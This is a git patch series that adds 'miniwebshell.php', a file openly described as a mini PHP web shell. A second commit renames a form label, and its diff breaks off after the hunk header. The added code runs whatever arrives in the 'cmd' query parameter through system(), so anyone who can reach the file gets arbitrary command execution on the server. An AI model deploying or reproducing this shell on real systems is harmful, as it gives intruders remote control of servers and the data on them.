From 61d0bd6c07911c1d67359a813297ec7b5811a857 Mon Sep 17 00:00:00 2001 From: Abhishek Sidharth <32158780+abhiabhi2306@users.noreply.github.com> Date: Tue, 16 Oct 2018 11:09:25 +0530 Subject: [PATCH 1/2] Create miniwebshell.php It is a mini phpwebshell, with the basic functions :) --- miniwebshell.php | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 miniwebshell.php diff --git a/miniwebshell.php b/miniwebshell.php new file mode 100644 index 0000000..bef4efd --- /dev/null +++ b/miniwebshell.php @@ -0,0 +1,15 @@ + +//Mini Webshell in PHP by @abhiabhi2306 (Abhishek Sidharth) +?> + +
+ + +if($_GET[‘cmd’]) { +system($_GET[‘cmd’]); +} +?> + From 99a0d53d941fa656c3f74a92cc18e455c7ad2cc0 Mon Sep 17 00:00:00 2001 From: Abhishek Sidharth <32158780+abhiabhi2306@users.noreply.github.com> Date: Wed, 20 Mar 2019 17:04:27 +0530 Subject: [PATCH 2/2] Update miniwebshell.php Updated "linux command" as "cmd" --- miniwebshell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miniwebshell.php b/miniwebshell.php index bef4efd..40b02aa 100644 --- a/miniwebshell.php +++ b/miniwebshell.php @@ -4,7 +4,7 @@